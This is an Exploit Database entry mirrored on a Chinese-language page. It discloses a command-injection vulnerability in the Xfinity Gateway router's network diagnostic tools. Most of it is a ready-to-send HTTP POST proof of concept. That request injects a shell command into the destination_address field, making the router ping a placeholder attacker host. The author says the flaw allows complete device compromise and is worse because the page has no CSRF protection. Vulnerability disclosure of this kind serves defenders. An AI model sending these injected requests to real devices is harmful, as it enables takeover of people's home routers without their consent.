Xfinity Gateway – Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： Gregory Smiley
  日期： 2016-12-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40856/

• # Exploit Title: Xfinity Gateway: Remote Code Execution
  # Date: 12/2/2016
  # Exploit Author: Gregory Smiley
  # Contact: gsx0r.sec@gmail.com
  # Vendor Homepage: http://xfinity.com
  # Platform: php
  
  The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
  
  PoC:
  
  POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
  Host: 10.0.0.1
  User-Agent:
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Referer: http://10.0.0.1/network_diagnostic_tools.php
  Content-Length: 91
  Cookie: PHPSESSID=; auth=
  DNT: 1
  X-Forwarded-For: 8.8.8.8
  Connection: keep-alive
  
  test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
  
  
  If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection.This can be leveraged to completely compromise the device.
  
  This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/